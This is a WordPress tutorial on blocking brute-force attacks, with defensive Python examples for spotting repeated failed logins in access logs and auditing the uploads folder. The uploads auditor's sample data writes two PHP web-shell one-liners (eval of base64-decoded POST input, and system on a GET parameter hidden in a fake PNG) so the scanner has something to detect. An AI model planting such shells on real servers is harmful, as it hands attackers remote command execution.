Do you want to protect your WordPress site from brute force attacks? These attacks can slow your site down, make it unreachable, and, if a password is guessed, give an attacker the access needed to install malware on your website. In this article, we will show you how to protect your WordPress site from brute force attacks.
A brute force attack is a hacking method that uses trial and error to break into a website, network, or computer system.
Hackers use automated software to send a large number of requests to the target system. With each request, the software tries another guess at the information needed to gain access, such as a password or PIN code, often working through lists of leaked and commonly used passwords before trying everything else.
These tools can also spread the requests across many different IP addresses and locations (for example through proxies or botnets), which makes it harder for the target system to recognise and block the activity as a single attack.
A successful brute force attack can give hackers access to the admin area of your website. They can install backdoors, malware, steal user information, and delete everything on your site.
Even unsuccessful brute force attacks can wreak havoc by sending too many requests, slowing down WordPress hosting servers and even crashing them.
With that said, let's take a look at how to protect your WordPress site from brute force attacks.
Brute force attacks put a lot of load on your servers. Even unsuccessful ones can slow down your website or crash the server outright. That's why it's important to block them before they reach your server.
To do that, you'll need a website firewall solution. A firewall filters out malicious traffic and blocks it from reaching your site.
There are two types of website firewalls that you can use.
Application-level firewalls - These firewall plugins examine traffic after it has already reached your server, before most of WordPress loads. This is less effective, because every request, including the attack traffic, is still processed by your server and adds to its load.
DNS-level website firewalls - These firewalls route your website traffic through their proxy servers in the cloud. Only legitimate traffic is passed on to your web hosting server, which also improves your WordPress speed and performance because the proxy absorbs and caches much of the load.
We recommend the use of Sucuri. It is the industry leader in website security and the best WordPress firewall on the market. Since it's a DNS-level firewall, it means that all of your website traffic goes through their proxy where bad traffic is filtered out.
We use Sucuri on our website, and you can read our full Sucuri review to learn more.
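Whichever firewall you use, it helps to be able to recognise the attack pattern the text describes in your own access log. The following is an added example, not code from the original article or from any firewall product: it parses Apache/Nginx combined-format log lines and flags IP addresses that produce many failed logins inside a short window. The sample log lines are constructed for the example, and the threshold, window and login path are assumptions you should tune; the check relies on WordPress answering a failed login with a 200 re-rendered form and a successful one with a 302 redirect to wp-admin.

```python
"""Spot WordPress login brute-force attempts in a combined-format access log."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Combined log format prefix: host ident user [time] "method path proto" status ...
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Constructed sample (not a real log): one attacker hammering wp-login.php,
# one normal visitor who reads a post and then logs in successfully.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Mar/2024:10:00:01 +0000] "POST /wp-login.php HTTP/1.1" 200 3450
203.0.113.7 - - [10/Mar/2024:10:00:02 +0000] "POST /wp-login.php HTTP/1.1" 200 3450
203.0.113.7 - - [10/Mar/2024:10:00:03 +0000] "POST /wp-login.php HTTP/1.1" 200 3450
203.0.113.7 - - [10/Mar/2024:10:00:04 +0000] "POST /wp-login.php HTTP/1.1" 200 3450
203.0.113.7 - - [10/Mar/2024:10:00:05 +0000] "POST /wp-login.php HTTP/1.1" 200 3450
203.0.113.7 - - [10/Mar/2024:10:00:06 +0000] "POST /wp-login.php HTTP/1.1" 200 3450
198.51.100.2 - - [10/Mar/2024:10:00:07 +0000] "GET /2024/03/hello-world/ HTTP/1.1" 200 12034
198.51.100.2 - - [10/Mar/2024:10:00:30 +0000] "POST /wp-login.php HTTP/1.1" 302 0
198.51.100.2 - - [10/Mar/2024:10:00:31 +0000] "GET /wp-admin/ HTTP/1.1" 200 9876
"""


def parse_line(line):
    """Return a dict for one log line, or None if the line is not in combined format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m.group("time"), "%d/%b/%Y:%H:%M:%S %z")
    return {
        "ip": m.group("ip"),
        "time": ts,
        "method": m.group("method"),
        "path": m.group("path").split("?")[0],  # drop query string
        "status": int(m.group("status")),
    }


def failed_logins(lines, login_path="/wp-login.php"):
    """Yield (ip, time) for POSTs to the login page that did not redirect.

    A successful WordPress login answers 302 to wp-admin; a failed attempt
    re-renders the login form with status 200.
    """
    for line in lines:
        rec = parse_line(line)
        if (rec and rec["method"] == "POST"
                and rec["path"] == login_path and rec["status"] == 200):
            yield rec["ip"], rec["time"]


def find_brute_force(lines, threshold=5, window=timedelta(minutes=1)):
    """Return {ip: total_failed_attempts} for IPs that reach `threshold`
    failed logins within any sliding `window` (assumed limits, tune per site)."""
    attempts = defaultdict(list)
    for ip, t in failed_logins(lines):
        attempts[ip].append(t)
    flagged = {}
    for ip, times in attempts.items():
        times.sort()
        start = 0
        for end, t in enumerate(times):
            while t - times[start] > window:   # slide window start forward
                start += 1
            if end - start + 1 >= threshold:
                flagged[ip] = len(times)
                break
    return flagged


if __name__ == "__main__":
    for ip, n in find_brute_force(SAMPLE_LOG.splitlines()).items():
        print(f"{ip}: {n} failed logins, candidate for a firewall block")
```

Run it against a real log with `find_brute_force(open("/var/log/apache2/access.log").read().splitlines())`; the flagged addresses are the ones an application-level firewall would have had to process one request at a time, and the ones a DNS-level firewall would have stopped before they reached the server.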
The automated tools behind brute force attacks often combine password guessing with attempts to exploit known vulnerabilities in older versions of WordPress core, popular WordPress plugins, or themes.
WordPress core and most popular WordPress plugins are open source, and vulnerabilities are usually fixed very quickly with an update. However, if you don't install the updates, your website stays exposed to those attacks.
Simply go to the Dashboard » Updates page in the WordPress admin area to check for available updates. This page lists all pending updates for WordPress core, plugins, and themes.
For more details, check out our guide on how to properly update WordPress plugins.
Most brute force attacks on a WordPress site are trying to gain access to the WordPress admin area. You can add password protection to your WordPress admin directory at the server level. This would block unauthorized access to your WordPress admin area.
Simply login to your WordPress hosting control panel (cPanel) and click the 'Directory Privacy' icon in the Files section.
Note: We're using Bluehost in our screenshot, but similar setups are available from other major hosting companies like SiteGround, HostGator, etc.
Next, you need to locate the wp-admin folder and click on the folder name.
cPanel will now ask you for a name for the protected folder (this is the label shown in the login prompt), a username, and a password. After entering this information, click the Save button. Behind the scenes cPanel writes Basic authentication directives into the folder's .htaccess file and stores the hashed password in a file outside your web root.
Your WordPress admin directory is now password protected. You will see a browser login prompt when you visit the WordPress admin area, before the normal WordPress login form.
If you encounter a 404 error or a "too many redirects" message, add the following line to the .htaccess file in your WordPress root folder. It tells Apache to use its plain built-in response for the 401 (authentication required) status instead of trying to load a custom error page that is itself behind the password prompt, which is what causes the loop.
ErrorDocument 401 default
Note that some plugins call /wp-admin/admin-ajax.php from the public side of your site. If a front-end feature stops working after you add the password, that file needs to be exempted from the protection.
For more details, check out our article on how to password protect your WordPress admin directory.
Two-factor authentication adds an extra layer of security to your WordPress login screen. In addition to their username and password, users must enter a one-time code, usually generated by an authenticator app on their phone, to access the WordPress admin area.
Adding two-factor authentication will make it more difficult for hackers to gain access even if they are able to crack your WordPress password.
For detailed step-by-step instructions, check out our guide on how to add two-factor authentication in WordPress.
Passwords are the keys to your WordPress site. You need to use a unique, strong password for every account. A strong password is long (12 characters or more), random, and mixes letters, numbers, and special characters; a unique one is never reused on another site, so that a leak elsewhere cannot be replayed against your login.
It is important that you use strong passwords not only for your WordPress user accounts but also for FTP, the web hosting control panel, and your WordPress database.
Beginners often ask us how they are supposed to remember all these unique passwords. You don't have to. There are excellent password manager apps that store your passwords securely and fill them in for you.
For more information, check out our beginner's guide on the best way to manage passwords for WordPress.
By default, when your web server doesn't find an index file (i.e. a file like index.php or index.html) in a folder, it automatically generates a page listing the contents of that directory.
During an attack, hackers can use these directory listings to discover file names, plugin and theme versions, and other files they can target. To turn listings off, add the following line to the bottom of your WordPress .htaccess file.
Options -Indexes
For more details, check out our article on how to disable directory browsing in WordPress.
Hackers who get write access to your site will try to plant and run a PHP script in one of your WordPress folders. WordPress itself is written in PHP, so you can't disable PHP execution everywhere.
However, some folders never need to run PHP. The main one is your WordPress uploads folder, located at /wp-content/uploads.
You can safely disable PHP execution in the uploads folder, which is a common place for hackers to hide backdoor files.
First, open a text editor such as Notepad on your computer and paste the following code. The deny rule must sit inside the <Files *.php> block: a bare deny rule would block every file in uploads, including your images.
<Files *.php>
deny from all
</Files>
Now save this file as .htaccess and upload it to the /wp-content/uploads/ folder on your website using an FTP client. On Apache 2.4 servers that do not load mod_access_compat, the line inside the block must be Require all denied instead of deny from all. To confirm it works, request any .php file under that folder in your browser; the server should answer 403 Forbidden instead of running it.
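The .htaccess rule stops PHP files in uploads from being executed, but it does not tell you whether any are already there. The following is an added example, not code from the original article or from any WordPress plugin, that scans an uploads folder for the two shapes a planted backdoor usually takes (a file with a PHP extension, including double extensions such as shell.php.jpg, and an "image" that actually contains a PHP open tag) and checks that the uploads .htaccess contains a <Files *.php> deny block. The sample directory tree and its file contents are constructed for the example; the list of extensions is an assumption based on what common Apache PHP handlers match.

```python
"""Audit a WordPress uploads folder for planted PHP and a missing deny rule."""
import os
import re
import tempfile

# Extensions a typical PHP handler would execute (assumed list; extend per server).
PHP_EXTENSIONS = {".php", ".phtml", ".php3", ".php4", ".php5", ".php7", ".phps", ".phar"}
# A PHP open tag inside a file that claims to be something else.
PHP_TAG_RE = re.compile(rb"<\?php|<\?=")
# The protective block: <Files *.php> ... deny from all | Require all denied ... </Files>
DENY_BLOCK_RE = re.compile(
    r"<Files\s+\*\.php>.*?(deny from all|Require all denied).*?</Files>",
    re.IGNORECASE | re.DOTALL,
)


def scan_uploads(root):
    """Return a sorted list of (relative_path, reason) for suspicious files under root."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root)
            # Check every suffix so shell.php.jpg is caught, not just the last one.
            suffixes = {"." + part for part in name.lower().split(".")[1:]}
            if suffixes & PHP_EXTENSIONS:
                findings.append((rel, "php extension"))
                continue
            with open(full, "rb") as fh:
                head = fh.read(64 * 1024)  # a backdoor's open tag sits near the start
            if PHP_TAG_RE.search(head):
                findings.append((rel, "php open tag in non-php file"))
    return sorted(findings)


def uploads_htaccess_blocks_php(root):
    """True if root/.htaccess contains a <Files *.php> block with a deny rule."""
    path = os.path.join(root, ".htaccess")
    if not os.path.exists(path):
        return False
    with open(path, encoding="utf-8", errors="replace") as fh:
        return bool(DENY_BLOCK_RE.search(fh.read()))


def build_sample_uploads(with_htaccess=False):
    """Constructed example tree: a real-looking image, a planted .php file and a
    PNG that hides a PHP payload. Returns the temporary root directory."""
    root = tempfile.mkdtemp(prefix="wp-uploads-")
    month = os.path.join(root, "2024", "03")
    os.makedirs(month)
    with open(os.path.join(month, "photo.jpg"), "wb") as f:
        f.write(b"\xff\xd8\xff\xe0" + b"\x00" * 32)           # JPEG header, harmless
    with open(os.path.join(month, "cache.php"), "wb") as f:
        f.write(b"<?php eval(base64_decode($_POST['c'])); ?>")  # typical backdoor shape
    with open(os.path.join(month, "logo.png"), "wb") as f:
        f.write(b"\x89PNG\r\n\x1a\n" + b"<?php system($_GET['cmd']); ?>")
    if with_htaccess:
        with open(os.path.join(root, ".htaccess"), "w") as f:
            f.write("<Files *.php>\ndeny from all\n</Files>\n")
    return root


if __name__ == "__main__":
    sample = build_sample_uploads()
    for rel, reason in scan_uploads(sample):
        print(f"SUSPICIOUS {rel}: {reason}")
    print("uploads .htaccess blocks PHP:", uploads_htaccess_blocks_php(sample))
```

Point `scan_uploads` at the real folder (`scan_uploads("/var/www/html/wp-content/uploads")`) after a clean install or restore and keep the output as a baseline; anything that appears later in that folder with a PHP extension or an open tag did not get there through the media library.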
Backups are the most important tool in your WordPress security arsenal. If all else fails, then backups will allow you to easily restore your website.
Most WordPress hosting companies offer limited backup options. However, these backups are not guaranteed and you are solely responsible for making your own backups.
There are several great WordPress backup plugins, which allow you to schedule automatic backups.
We recommend the use of UpdraftPlus. It's beginner-friendly and lets you quickly set up automatic backups and store them in remote locations like Google Drive, Dropbox, Amazon S3, and more.
For step-by-step instructions, check out our guide on how to backup and restore your WordPress site with UpdraftPlus
All the tips mentioned above will help you protect your WordPress site against brute force attacks. For a more comprehensive security setup, you should follow the instructions in our WordPress security guide for beginners.
We hope this article has helped you learn how to protect your WordPress site from brute force attacks. You may also want to see the signs that your WordPress has been hacked and how to fix a hacked WordPress site.
If you enjoyed this article, please subscribe to our WordPress YouTube Channel video tutorials. You can also find us on Twitter and Facebook.